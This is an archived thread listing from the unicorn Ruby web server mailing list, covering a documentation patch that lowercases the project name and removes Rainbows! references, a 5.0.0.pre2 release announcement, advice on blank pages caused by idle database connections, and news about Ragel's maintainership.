	gitlab-webrick  (should be the default)
	gitlab-puma
	gitlab-passenger
	gitlab-unicorn
	...

Given unicorn has always required the use of nginx for exposure to
public clients, unicorn is perhaps the worst choice as a default
server for people unwilling to read documentation and edit config
files.

^ permalink raw reply	[relevance 0%]

* Re: Request to follow SemVer/mention it in homepage
  @ 2015-09-29  9:26  3%   ` Jérémy Lecour
  2015-09-29 19:43  0%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Jérémy Lecour @ 2015-09-29  9:26 UTC (permalink / raw)
  To: Eric Wong; +Cc: Pirate Praveen, unicorn-public

On Tue, Sep 29, 2015 at 9:36 AM, Eric Wong <e@80x24.org> wrote:
> Tying a Rack app to unicorn is totally, completely wrong and defeats the
> point of Rack.

I completely agree with that statement.

However, having an app with a hard dependency on a specific app server
is not the same as providing a default setup for a given app server.

For example, an app like Gitlab, Discourse or whatever might provide a
good default configuration for Unicorn, a set of optimisations in the
context of Unicorn (pre/post fork instructions…) and have something
that works great out of the box, even if it's not restricted to
Unicorn.
Someone who would want to change to Passenger, Puma or something else
would have to adapt the configuration and port the optimizations, but
the app would work the same as with Unicorn, without crippled features.
Someone who wouldn't change or tweak anything would have good settings
by default.

-- 
Jérémy Lecour :
http://jeremy.wordpress.com - http://twitter.com/jlecour

^ permalink raw reply	[relevance 3%]

* [PATCH] doc: remove references to old servers
@ 2015-07-15 22:05  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-07-15 22:05 UTC (permalink / raw)
  To: unicorn-public

They'll continue to be maintained, but we're no longer advertising
them.  Also, favor lowercase "unicorn" while we're at it since that
matches the executable and gem name to avoid unnecessary escaping
for RDoc.
---
 Application_Timeouts             |  6 +++---
 KNOWN_ISSUES                     | 14 +++++++-------
 Links                            | 30 ++++++++++++++----------------
 PHILOSOPHY                       |  6 ------
 README                           | 32 ++++++++++++++++----------------
 Sandbox                          |  2 +-
 TUNING                           | 10 +++++-----
 examples/nginx.conf              | 21 ++++++++++-----------
 ext/unicorn_http/unicorn_http.rl |  2 +-
 lib/unicorn.rb                   |  6 +++---
 lib/unicorn/configurator.rb      | 24 ++++++++++--------------
 lib/unicorn/http_server.rb       |  4 ++--
 lib/unicorn/socket_helper.rb     |  8 +++-----
 lib/unicorn/util.rb              |  2 +-
 lib/unicorn/worker.rb            |  4 ++--
 15 files changed, 78 insertions(+), 93 deletions(-)

diff --git a/Application_Timeouts b/Application_Timeouts
index 5f0370d..561a1cc 100644
--- a/Application_Timeouts
+++ b/Application_Timeouts
@@ -4,10 +4,10 @@ This article focuses on _application_ setup for Rack applications, but
 can be expanded to all applications that connect to external resources
 and expect short response times.
 
-This article is not specific to \Unicorn, but exists to discourage
+This article is not specific to unicorn, but exists to discourage
 the overuse of the built-in
 {timeout}[link:Unicorn/Configurator.html#method-i-timeout] directive
-in \Unicorn.
+in unicorn.
 
 == ALL External Resources Are Considered Unreliable
 
@@ -71,7 +71,7 @@ handle network/server failures.
 == The Last Line Of Defense
 
 The {timeout}[link:Unicorn/Configurator.html#method-i-timeout] mechanism
-in \Unicorn is an extreme solution that should be avoided whenever
+in unicorn is an extreme solution that should be avoided whenever
 possible.  It will help catch bugs in your application where and when
 your application forgets to use timeouts, but it is expensive as it
 kills and respawns a worker process.
diff --git a/KNOWN_ISSUES b/KNOWN_ISSUES
index 1950223..6b80517 100644
--- a/KNOWN_ISSUES
+++ b/KNOWN_ISSUES
@@ -13,7 +13,7 @@ acceptable solution.  Those issues are documented here.
 
 * PRNGs (pseudo-random number generators) loaded before forking
   (e.g. "preload_app true") may need to have their internal state
-  reset in the after_fork hook.  Starting with \Unicorn 3.6.1, we
+  reset in the after_fork hook.  Starting with unicorn 3.6.1, we
   have builtin workarounds for Kernel#rand and OpenSSL::Random users,
   but applications may use other PRNGs.
 
@@ -36,13 +36,13 @@ acceptable solution.  Those issues are documented here.
 
 * Under some versions of Ruby 1.8, it is necessary to call +srand+ in an
   after_fork hook to get correct random number generation.  We have a builtin
-  workaround for this starting with \Unicorn 3.6.1
+  workaround for this starting with unicorn 3.6.1
 
   See http://blade.nagaokaut.ac.jp/cgi-bin/scat.rb/ruby/ruby-core/36450
 
 * On Ruby 1.8 prior to Ruby 1.8.7-p248, *BSD platforms have a broken
   stdio that causes failure for file uploads larger than 112K.  Upgrade
-  your version of Ruby or continue using Unicorn 1.x/3.4.x.
+  your version of Ruby or continue using unicorn 1.x/3.4.x.
 
 * Under Ruby 1.9.1, methods like Array#shuffle and Array#sample will
   segfault if called after forking.  Upgrade to Ruby 1.9.2 or call
@@ -53,12 +53,12 @@ acceptable solution.  Those issues are documented here.
 
 * Rails 2.3.2 bundles its own version of Rack.  This may cause subtle
   bugs when simultaneously loaded with the system-wide Rack Rubygem
-  which Unicorn depends on.  Upgrading to Rails 2.3.4 (or later) is
+  which unicorn depends on.  Upgrading to Rails 2.3.4 (or later) is
   strongly recommended for all Rails 2.3.x users for this (and security
   reasons).  Rails 2.2.x series (or before) did not bundle Rack and are
   should be unnaffected.  If there is any reason which forces your
   application to use Rails 2.3.2 and you have no other choice, then
-  you may edit your Unicorn gemspec and remove the Rack dependency.
+  you may edit your unicorn gemspec and remove the Rack dependency.
 
   ref: http://mid.gmane.org/20091014221552.GA30624@dcvr.yhbt.net
   Note: the workaround described in the article above only made
@@ -71,9 +71,9 @@ acceptable solution.  Those issues are documented here.
     set :env, :production
     set :run, false
   Since this is no longer an issue with Sinatra 0.9.x apps, this will not be
-  fixed on our end.  Since Unicorn is itself the application launcher, the
+  fixed on our end.  Since unicorn is itself the application launcher, the
   at_exit handler used in old Sinatra always caused Mongrel to be launched
-  whenever a Unicorn worker was about to exit.
+  whenever a unicorn worker was about to exit.
 
   Also remember we're capable of replacing the running binary without dropping
   any connections regardless of framework :)
diff --git a/Links b/Links
index 5a586c1..ad05afd 100644
--- a/Links
+++ b/Links
@@ -1,13 +1,13 @@
 = Related Projects
 
-If you're interested in \Unicorn, you may be interested in some of the projects
+If you're interested in unicorn, you may be interested in some of the projects
 listed below.  If you have any links to add/change/remove, please tell us at
 mailto:unicorn-public@bogomips.org!
 
 == Disclaimer
 
-The \Unicorn project is not responsible for the content in these links.
-Furthermore, the \Unicorn project has never, does not and will never endorse:
+The unicorn project is not responsible for the content in these links.
+Furthermore, the unicorn project has never, does not and will never endorse:
 
 * any for-profit entities or services
 * any non-{Free Software}[http://www.gnu.org/philosophy/free-sw.html]
@@ -15,13 +15,13 @@ Furthermore, the \Unicorn project has never, does not and will never endorse:
 The existence of these links does not imply endorsement of any entities
 or services behind them.
 
-=== For use with \Unicorn
+=== For use with unicorn
 
 * {Bluepill}[https://github.com/arya/bluepill] -
   a simple process monitoring tool written in Ruby
 
 * {golden_brindle}[https://github.com/simonoff/golden_brindle] - tool to
-  manage multiple \Unicorn instances/applications on a single server
+  manage multiple unicorn instances/applications on a single server
 
 * {raindrops}[http://raindrops.bogomips.org/] - real-time stats for
   preforking Rack servers
@@ -29,27 +29,25 @@ or services behind them.
 * {UnXF}[http://bogomips.org/unxf/]  Un-X-Forward* the Rack environment,
   useful since unicorn is designed to be deployed behind a reverse proxy.
 
-=== \Unicorn is written to work with
+=== unicorn is written to work with
 
 * {Rack}[http://rack.github.io/] - a minimal interface between webservers
   supporting Ruby and Ruby frameworks
 
 * {Ruby}[https://www.ruby-lang.org/en/] - the programming language of
-  Rack and \Unicorn
+  Rack and unicorn
 
-* {nginx}[http://nginx.org/] - the reverse proxy for use with \Unicorn
+* {nginx}[http://nginx.org/] - the reverse proxy for use with unicorn
 
-* {kgio}[http://bogomips.org/kgio/] - the I/O library written for \Unicorn
+* {kgio}[http://bogomips.org/kgio/] - the I/O library written for unicorn
+  (deprecated and functionality being mainlined into Ruby)
 
 === Derivatives
 
-* {Green Unicorn}[http://gunicorn.org/] - a Python version of \Unicorn
+* {Green Unicorn}[http://gunicorn.org/] - a Python version of unicorn
 
-* {Rainbows!}[http://rainbows.bogomips.org/] - \Unicorn for sleepy
-  apps and slow clients (historical).
-
-* {yahns}[http://yahns.yhbt.net/] - like Rainbows!, but with fewer options
-  and designed for energy efficiency on idle sites.
+* {yahns}[http://yahns.yhbt.net/] - the complete opposite of unicorn in
+  every imaginable way.  Designed for energy efficiency on idle sites.
 
 === Prior Work
 
@@ -57,4 +55,4 @@ or services behind them.
   unicorn is based on
 
 * {david}[http://bogomips.org/david.git] - a tool to explain why you need
-  nginx in front of \Unicorn
+  nginx in front of unicorn
diff --git a/PHILOSOPHY b/PHILOSOPHY
index 18b2d82..feb83d9 100644
--- a/PHILOSOPHY
+++ b/PHILOSOPHY
@@ -137,9 +137,3 @@ unicorn is highly inefficient for Comet/reverse-HTTP/push applications
 where the HTTP connection spends a large amount of time idle.
 Nevertheless, the ease of troubleshooting, debugging, and management of
 unicorn may still outweigh the drawbacks for these applications.
-
-The {Rainbows!}[http://rainbows.bogomips.org/] aims to fill the gap for
-odd corner cases where the nginx + unicorn combination is not enough.
-While Rainbows! management/administration is largely identical to
-unicorn, Rainbows! is far more ambitious and has seen little real-world
-usage.
diff --git a/README b/README
index bd626e9..dc121d3 100644
--- a/README
+++ b/README
@@ -1,10 +1,10 @@
-= Unicorn: Rack HTTP server for fast clients and Unix
+= unicorn: Rack HTTP server for fast clients and Unix
 
-\Unicorn is an HTTP server for Rack applications designed to only serve
+unicorn is an HTTP server for Rack applications designed to only serve
 fast clients on low-latency, high-bandwidth connections and take
 advantage of features in Unix/Unix-like kernels.  Slow clients should
 only be served by placing a reverse proxy capable of fully buffering
-both the the request and response in between \Unicorn and slow clients.
+both the the request and response in between unicorn and slow clients.
 
 == Features
 
@@ -15,9 +15,9 @@ both the the request and response in between \Unicorn and slow clients.
 * Compatible with Ruby 1.9.3 and later.
   unicorn 4.8.x will remain supported for Ruby 1.8 users.
 
-* Process management: \Unicorn will reap and restart workers that
+* Process management: unicorn will reap and restart workers that
   die from broken apps.  There is no need to manage multiple processes
-  or ports yourself.  \Unicorn can spawn and manage any number of
+  or ports yourself.  unicorn can spawn and manage any number of
   worker processes you choose to scale to your backend.
 
 * Load balancing is done entirely by the operating system kernel.
@@ -33,11 +33,11 @@ both the the request and response in between \Unicorn and slow clients.
 * Builtin reopening of all log files in your application via
   USR1 signal.  This allows logrotate to rotate files atomically and
   quickly via rename instead of the racy and slow copytruncate method.
-  \Unicorn also takes steps to ensure multi-line log entries from one
+  unicorn also takes steps to ensure multi-line log entries from one
   request all stay within the same file.
 
 * nginx-style binary upgrades without losing connections.
-  You can upgrade \Unicorn, your entire application, libraries
+  You can upgrade unicorn, your entire application, libraries
   and even your Ruby interpreter without dropping clients.
 
 * before_fork and after_fork hooks in case your application
@@ -60,15 +60,15 @@ both the the request and response in between \Unicorn and slow clients.
 
 == License
 
-\Unicorn is copyright 2009 by all contributors (see logs in git).
+unicorn is copyright 2009 by all contributors (see logs in git).
 It is based on Mongrel 1.1.5.
 Mongrel is copyright 2007 Zed A. Shaw and contributors.
 
-\Unicorn is licensed under (your choice) of the GPLv2 or later
+unicorn is licensed under (your choice) of the GPLv2 or later
 (GPLv3+ preferred), or Ruby (1.8)-specific terms.
 See the included LICENSE file for details.
 
-\Unicorn is 100% Free Software.
+unicorn is 100% Free Software.
 
 == Install
 
@@ -108,17 +108,17 @@ In RAILS_ROOT, run:
 
   unicorn_rails
 
-\Unicorn will bind to all interfaces on TCP port 8080 by default.
+unicorn will bind to all interfaces on TCP port 8080 by default.
 You may use the +--listen/-l+ switch to bind to a different
 address:port or a UNIX socket.
 
 === Configuration File(s)
 
-\Unicorn will look for the config.ru file used by rackup in APP_ROOT.
+unicorn will look for the config.ru file used by rackup in APP_ROOT.
 
-For deployments, it can use a config file for \Unicorn-specific options
+For deployments, it can use a config file for unicorn-specific options
 specified by the +--config-file/-c+ command-line switch.  See
-Unicorn::Configurator for the syntax of the \Unicorn-specific options.
+Unicorn::Configurator for the syntax of the unicorn-specific options.
 The default settings are designed for maximum out-of-the-box
 compatibility with existing applications.
 
@@ -130,7 +130,7 @@ supported.  Run `unicorn -h` to see command-line options.
 There is NO WARRANTY whatsoever if anything goes wrong, but
 {let us know}[link:ISSUES.html] and we'll try our best to fix it.
 
-\Unicorn is designed to only serve fast clients either on the local host
+unicorn is designed to only serve fast clients either on the local host
 or a fast LAN.  See the PHILOSOPHY and DESIGN documents for more details
 regarding this.
 
@@ -140,6 +140,6 @@ All feedback (bug reports, user/development dicussion, patches, pull
 requests) go to the mailing list/newsgroup.  See the ISSUES document for
 information on the {mailing list}[mailto:unicorn-public@bogomips.org].
 
-For the latest on \Unicorn releases, you may also finger us at
+For the latest on unicorn releases, you may also finger us at
 unicorn@bogomips.org or check our NEWS page (and subscribe to our Atom
 feed).
diff --git a/Sandbox b/Sandbox
index a6c3fe7..997b92f 100644
--- a/Sandbox
+++ b/Sandbox
@@ -1,4 +1,4 @@
-= Tips for using \Unicorn with Sandbox installation tools
+= Tips for using unicorn with Sandbox installation tools
 
 Since unicorn includes executables and is usually used to start a Ruby
 process, there are certain caveats to using it with tools that sandbox
diff --git a/TUNING b/TUNING
index 6a6d7db..247090b 100644
--- a/TUNING
+++ b/TUNING
@@ -1,10 +1,10 @@
-= Tuning \Unicorn
+= Tuning unicorn
 
-\Unicorn performance is generally as good as a (mostly) Ruby web server
+unicorn performance is generally as good as a (mostly) Ruby web server
 can provide.  Most often the performance bottleneck is in the web
 application running on Unicorn rather than Unicorn itself.
 
-== \Unicorn Configuration
+== unicorn Configuration
 
 See Unicorn::Configurator for details on the config file format.
 +worker_processes+ is the most-commonly needed tuning parameter.
@@ -14,7 +14,7 @@ See Unicorn::Configurator for details on the config file format.
 * worker_processes should be scaled to the number of processes your
   backend system(s) can support.  DO NOT scale it to the number of
   external network clients your application expects to be serving.
-  \Unicorn is NOT for serving slow clients, that is the job of nginx.
+  unicorn is NOT for serving slow clients, that is the job of nginx.
 
 * worker_processes should be *at* *least* the number of CPU cores on
   a dedicated server (unless you do not have enough memory).
@@ -58,7 +58,7 @@ See Unicorn::Configurator for details on the config file format.
 * UNIX domain sockets are slightly faster than TCP sockets, but only
   work if nginx is on the same machine.
 
-== Other \Unicorn settings
+== Other unicorn settings
 
 * Setting "preload_app true" can allow copy-on-write-friendly GC to
   be used to save memory.  It will probably not work out of the box with
diff --git a/examples/nginx.conf b/examples/nginx.conf
index a68fe6f..0583c1f 100644
--- a/examples/nginx.conf
+++ b/examples/nginx.conf
@@ -1,5 +1,5 @@
 # This is example contains the bare mininum to get nginx going with
-# Unicorn or Rainbows! servers.  Generally these configuration settings
+# unicorn servers.  Generally these configuration settings
 # are applicable to other HTTP application servers (and not just Ruby
 # ones), so if you have one working well for proxying another app
 # server, feel free to continue using it.
@@ -44,8 +44,8 @@ http {
   # click tracking!
   access_log /path/to/nginx.access.log combined;
 
-  # you generally want to serve static files with nginx since neither
-  # Unicorn nor Rainbows! is optimized for it at the moment
+  # you generally want to serve static files with nginx since
+  # unicorn is not and will never be optimized for it
   sendfile on;
 
   tcp_nopush on; # off may be better for *some* Comet/long-poll stuff
@@ -67,10 +67,10 @@ http {
              text/javascript application/x-javascript
              application/atom+xml;
 
-  # this can be any application server, not just Unicorn/Rainbows!
+  # this can be any application server, not just unicorn
   upstream app_server {
     # fail_timeout=0 means we always retry an upstream even if it failed
-    # to return a good HTTP response (in case the Unicorn master nukes a
+    # to return a good HTTP response (in case the unicorn master nukes a
     # single worker for timing out).
 
     # for UNIX domain socket setups:
@@ -132,12 +132,11 @@ http {
       # redirects, we set the Host: header above already.
       proxy_redirect off;
 
-      # set "proxy_buffering off" *only* for Rainbows! when doing
-      # Comet/long-poll/streaming.  It's also safe to set if you're using
-      # only serving fast clients with Unicorn + nginx, but not slow
-      # clients.  You normally want nginx to buffer responses to slow
-      # clients, even with Rails 3.1 streaming because otherwise a slow
-      # client can become a bottleneck of Unicorn.
+      # It's also safe to set if you're using only serving fast clients
+      # with unicorn + nginx, but not slow clients.  You normally want
+      # nginx to buffer responses to slow clients, even with Rails 3.1
+      # streaming because otherwise a slow client can become a bottleneck
+      # of unicorn.
       #
       # The Rack application may also set "X-Accel-Buffering (yes|no)"
       # in the response headers do disable/enable buffering on a
diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index a5f069d..046ccb5 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -38,7 +38,7 @@ static VALUE set_maxhdrlen(VALUE self, VALUE len)
   return UINT2NUM(MAX_HEADER_LEN = NUM2UINT(len));
 }
 
-/* keep this small for Rainbows! since every client has one */
+/* keep this small for other servers (e.g. yahns) since every client has one */
 struct http_parser {
   int cs; /* Ragel internal state */
   unsigned int flags;
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 9fdcb8e..b0e6bd1 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -10,10 +10,10 @@ require 'kgio'
 # enough functionality to service web application requests fast as possible.
 # :startdoc:
 
-# \Unicorn exposes very little of an user-visible API and most of its
-# internals are subject to change.  \Unicorn is designed to host Rack
+# unicorn exposes very little of an user-visible API and most of its
+# internals are subject to change.  unicorn is designed to host Rack
 # applications, so applications should be written against the Rack SPEC
-# and not \Unicorn internals.
+# and not unicorn internals.
 module Unicorn
 
   # Raised inside TeeInput when a client closes the socket inside the
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index 02f6b6b..4da19bb 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -1,7 +1,7 @@
 # -*- encoding: binary -*-
 require 'logger'
 
-# Implements a simple DSL for configuring a \Unicorn server.
+# Implements a simple DSL for configuring a unicorn server.
 #
 # See http://unicorn.bogomips.org/examples/unicorn.conf.rb and
 # http://unicorn.bogomips.org/examples/unicorn.conf.minimal.rb
@@ -282,20 +282,19 @@ class Unicorn::Configurator
   #   Setting this to +true+ can make streaming responses in Rails 3.1
   #   appear more quickly at the cost of slightly higher bandwidth usage.
   #   The effect of this option is most visible if nginx is not used,
-  #   but nginx remains highly recommended with \Unicorn.
+  #   but nginx remains highly recommended with unicorn.
   #
   #   This has no effect on UNIX sockets.
   #
-  #   Default: +true+ (Nagle's algorithm disabled) in \Unicorn,
-  #   +true+ in Rainbows!  This defaulted to +false+ in \Unicorn
-  #   3.x
+  #   Default: +true+ (Nagle's algorithm disabled) in unicorn
+  #   This defaulted to +false+ in unicorn 3.x
   #
   # [:tcp_nopush => true or false]
   #
   #   Enables/disables TCP_CORK in Linux or TCP_NOPUSH in FreeBSD
   #
   #   This prevents partial TCP frames from being sent out and reduces
-  #   wakeups in nginx if it is on a different machine.  Since \Unicorn
+  #   wakeups in nginx if it is on a different machine.  Since unicorn
   #   is only designed for applications that send the response body
   #   quickly without keepalive, sockets will always be flushed on close
   #   to prevent delays.
@@ -303,7 +302,7 @@ class Unicorn::Configurator
   #   This has no effect on UNIX sockets.
   #
   #   Default: +false+
-  #   This defaulted to +true+ in \Unicorn 3.4 - 3.7
+  #   This defaulted to +true+ in unicorn 3.4 - 3.7
   #
   # [:ipv6only => true or false]
   #
@@ -387,12 +386,10 @@ class Unicorn::Configurator
   #   and +false+ or +nil+ is synonymous for a value of zero.
   #
   #   A value of +1+ is a good optimization for local networks
-  #   and trusted clients.  For Rainbows! and Zbatery users, a higher
-  #   value (e.g. +60+) provides more protection against some
-  #   denial-of-service attacks.  There is no good reason to ever
-  #   disable this with a +zero+ value when serving HTTP.
+  #   and trusted clients.  There is no good reason to ever
+  #   disable this with a +zero+ value with unicorn.
   #
-  #   Default: 1 retransmit for \Unicorn, 60 for Rainbows! 0.95.0\+
+  #   Default: 1
   #
   # [:accept_filter => String]
   #
@@ -401,8 +398,7 @@ class Unicorn::Configurator
   #   This enables either the "dataready" or (default) "httpready"
   #   accept() filter under FreeBSD.  This is intended as an
   #   optimization to reduce context switches with common GET/HEAD
-  #   requests.  For Rainbows! and Zbatery users, this provides
-  #   some protection against certain denial-of-service attacks, too.
+  #   requests.
   #
   #   There is no good reason to change from the default.
   #
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 0f97516..3dbfd3e 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -7,8 +7,8 @@
 #
 # Users do not need to know the internals of this class, but reading the
 # {source}[http://bogomips.org/unicorn.git/tree/lib/unicorn/http_server.rb]
-# is education for programmers wishing to learn how \Unicorn works.
-# See Unicorn::Configurator for information on how to configure \Unicorn.
+# is education for programmers wishing to learn how unicorn works.
+# See Unicorn::Configurator for information on how to configure unicorn.
 class Unicorn::HttpServer
   # :stopdoc:
   attr_accessor :app, :timeout, :worker_processes,
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index 812ac53..df8315e 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -5,14 +5,12 @@ require 'socket'
 module Unicorn
   module SocketHelper
 
-    # internal interface, only used by Rainbows!/Zbatery
+    # internal interface
     DEFAULTS = {
       # The semantics for TCP_DEFER_ACCEPT changed in Linux 2.6.32+
       # with commit d1b99ba41d6c5aa1ed2fc634323449dd656899e9
-      # This change shouldn't affect Unicorn users behind nginx (a
-      # value of 1 remains an optimization), but Rainbows! users may
-      # want to use a higher value on Linux 2.6.32+ to protect against
-      # denial-of-service attacks
+      # This change shouldn't affect unicorn users behind nginx (a
+      # value of 1 remains an optimization).
       :tcp_defer_accept => 1,
 
       # FreeBSD, we need to override this to 'dataready' if we
diff --git a/lib/unicorn/util.rb b/lib/unicorn/util.rb
index c7784bd..2f8bfeb 100644
--- a/lib/unicorn/util.rb
+++ b/lib/unicorn/util.rb
@@ -1,7 +1,7 @@
 # -*- encoding: binary -*-
 
 require 'fcntl'
-module Unicorn::Util
+module Unicorn::Util # :nodoc:
 
 # :stopdoc:
   def self.is_log?(fp)
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index b3f8afe..6748a2f 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -3,8 +3,8 @@ require "raindrops"
 
 # This class and its members can be considered a stable interface
 # and will not change in a backwards-incompatible fashion between
-# releases of \Unicorn.  Knowledge of this class is generally not
-# not needed for most users of \Unicorn.
+# releases of unicorn.  Knowledge of this class is generally not
+# not needed for most users of unicorn.
 #
 # Some users may want to access it in the before_fork/after_fork hooks.
 # See the Unicorn::Configurator RDoc for examples.
-- 
EW


^ permalink raw reply related	[relevance 2%]

* [ANN] unicorn 5.0.0.pre2 - another prerelease!
  @ 2015-07-06 21:41  3% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-07-06 21:41 UTC (permalink / raw)
  To: unicorn-public

There is a minor change: TCP socket options are now applied to
inherited sockets, and we have native support for inheriting sockets
from systemd (by emulating the sd_listen_fds(3) function).

Dynamic changes in the application to Rack::Utils::HTTP_STATUS_CODES
are now supported, so you can use your own custom status lines.
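
For example, something like this in an initializer should show up in
the status line unicorn writes (just a sketch of the idea; the hash is
consulted at response time now instead of strings cached at load time):

require 'rack/utils'
# e.g. in an initializer; later 200 responses use the custom reason phrase
Rack::Utils::HTTP_STATUS_CODES[200] = 'Custom OK'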

Ruby 2.2 and later is now favored for performance.
Optimizations by using constants which made sense in earlier
versions of Ruby are gone: so users of old Ruby versions
will see performance regressions.  Ruby 2.2 users should
see the same or better performance, and we have less code
as a result.

* doc: update some invalid URLs
* apply TCP socket options on inherited sockets
* reflect changes in Rack::Utils::HTTP_STATUS_CODES
* reduce constants and optimize for Ruby 2.2
* http_response: reduce size of multi-line header path
* emulate sd_listen_fds for systemd support
* test/unit/test_response.rb: compatibility with older test-unit

This also includes all changes in unicorn 5.0.0.pre1:

http://bogomips.org/unicorn-public/m/20150615225652.GA16164@dcvr.yhbt.net.html

-- 
EW

^ permalink raw reply	[relevance 3%]

* Re: Unicorn returns blank page after no use
  @ 2015-07-01 17:30  2% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-07-01 17:30 UTC (permalink / raw)
  To: Farjad Adamjee; +Cc: unicorn-public

Farjad Adamjee <fadamjee@vailsys.com> wrote:
> Hello,
> 
> I am not sure if this is the correct place for this, I have googled
> around to see if anyone else has encountered such an issue, but I
> did not find anything.

This is the correct place :)  Plain-text email is the only way I
handle support for ease-of-archival and distribution.

> I am having this issue where after a period of time of no use (on
> beta [production] environment), maybe 12 hours or so, the unicorn
> process sleeps. When I go and re-request the page, it returns blank.

This sounds like a database (or any other persistent connection
backend) connection expiring due to an idle timeout.

This could also be a firewall/router timeout problem between the
server running unicorn and the database host.

Tony experienced this last year:
http://bogomips.org/unicorn-public/m/CAKM1sPNRsES6H6ByK6bO9Djwa8WvYV6HJ-rEaHopRUYBVFfuhg@mail.gmail.com

You can confirm by running lsof on a worker process to look for
open sockets.  In case the connection loss isn't noticed by the
OS, use strace (or any other similar syscall tracer for your OS)
instead and watch connection activity.

With strace (or similar), knock yourself down to one worker
process via SIGTTOU to the master to ensure you're always tracing
the correct one.

> I am using Apache proxy to Unicorn.

By the way, this is not recommended for slow clients.
nginx (Open Source edition) is currently the only supported proxy.

>   # Using this method we get 0 downtime deploys.
>   defined?(ActiveRecord::Base) and
> ActiveRecord::Base.connection.disconnect!
>   defined?(OathKeeper) and OathKeeper.disconnect!

I suggest disabling any idle timeout you might have, enabling TCP
keepalive and enabling reconnects (see AR and your database driver
documentation).  Worst case (a firewall/router problem you can't
fix via configuration) is to send a request to unicorn every
few minutes/hours to keep things going.
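
If you do end up with the periodic-request workaround, even a tiny
cron-driven Ruby script is enough (sketch only; host, port and path
are placeholders for your setup):

require 'net/http'
# hit a cheap endpoint so idle backend connections get exercised
Net::HTTP.start('127.0.0.1', 8080) { |http| http.get('/') }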

Perhaps OathKeeper has the same problem, too...
I've never heard of it until now.

^ permalink raw reply	[relevance 2%]

* Re: TAN: Ragel now maintained by Colm networks
  2015-06-26 19:46  2% TAN: Ragel now maintained by Colm networks Eric Wong
@ 2015-06-26 21:03  0% ` Bráulio Bhavamitra
  0 siblings, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2015-06-26 21:03 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Sad news to hear of companies that don't understand free software taking
over maintainership of good free software :(

Maybe the best would be to maintain a fork of it...

cheers,
bráulio

On Fri, Jun 26, 2015 at 4:46 PM, Eric Wong <e@80x24.org> wrote:
> As most of you know, unicorn has always used Ragel for HTTP
> parsing (inherited from Mongrel).
>
> For the most part, Ragel works great and does not need much
> maintenance.  I made some changes to work with the Ragel 5-to-6
> transition for Mongrel (pre-unicorn) and that was it.
>
> Since I mainly use Ragel from the Debian package nowadays,
> I missed this bit of news when it was posted 2014-10-24.
>
> http://www.colm.net/ragel-now-maintained-by-colm-networks/
>
> | As of October 2014, Ragel will be maintained by Colm Networks.
> | This is a new consulting company founded by Dr. Adrian D.
> | Thurston.
>
> (ed: Adrian Thurston is the original author of Ragel)
>
> | Since we cannot operate in the open, the git repository for
> | Ragel  will no longer be available. The project will be
> | published as release (and pre-release) tarballs only. On the
> | upside, Ragel will get much more attention.
>
> *Sigh* I guess we'll need to diff release tarballs from now on...
>
> I'm not very knowledgeable in C++, so any extra help auditing Ragel
> changes would be greatly appreciated.
>
> | The license will remain the same: GPLv2 with an exception for
> | the generated code derived from Ragel source.
>
> OK, at least that is good to hear.
>
> Fwiw, the ragel-users mailing list (where I lurked) closed in
> July 2014, too.
>
> Anyways, I still love Ragel as a tool/language and have used it
> in other projects.  For now, it seems to work, but I'm hesitant
> to start new projects using it.
>

^ permalink raw reply	[relevance 0%]

* TAN: Ragel now maintained by Colm networks
@ 2015-06-26 19:46  2% Eric Wong
  2015-06-26 21:03  0% ` Bráulio Bhavamitra
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2015-06-26 19:46 UTC (permalink / raw)
  To: unicorn-public

As most of you know, unicorn has always used Ragel for HTTP
parsing (inherited from Mongrel).

For the most part, Ragel works great and does not need much
maintenance.  I made some changes to work with the Ragel 5-to-6
transition for Mongrel (pre-unicorn) and that was it.

Since I mainly use Ragel from the Debian package nowadays,
I missed this bit of news when it was posted 2014-10-24.

http://www.colm.net/ragel-now-maintained-by-colm-networks/

| As of October 2014, Ragel will be maintained by Colm Networks. 
| This is a new consulting company founded by Dr. Adrian D.
| Thurston.

(ed: Adrian Thurston is the original author of Ragel)

| Since we cannot operate in the open, the git repository for
| Ragel  will no longer be available. The project will be
| published as release (and pre-release) tarballs only. On the
| upside, Ragel will get much more attention.

*Sigh* I guess we'll need to diff release tarballs from now on...

I'm not very knowledgeable in C++, so any extra help auditing Ragel
changes would be greatly appreciated.

| The license will remain the same: GPLv2 with an exception for
| the generated code derived from Ragel source.

OK, at least that is good to hear.

Fwiw, the ragel-users mailing list (where I lurked) closed in
July 2014, too.

Anyways, I still love Ragel as a tool/language and have used it
in other projects.  For now, it seems to work, but I'm hesitant
to start new projects using it.

^ permalink raw reply	[relevance 2%]

* [PATCH 2/2] http: move response_start_sent into the C ext
  @ 2015-06-06  1:58  2% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-06-06  1:58 UTC (permalink / raw)
  To: unicorn-public; +Cc: Eric Wong

Combined with the previous commit to eliminate the `@socket'
instance variable, this eliminates the last instance variable
in the Unicorn::HttpRequest class.

Eliminating the last instance variable avoids the creation of an
internal hash table used for implementing the "generic" instance
variables found in non-pure-Ruby classes.  Method entry overhead
remains the same.

While this change doesn't do a whole lot for unicorn memory usage
where the HttpRequest is a singleton, it helps other HTTP servers
which rely on this code where thousands of clients may be connected.
---
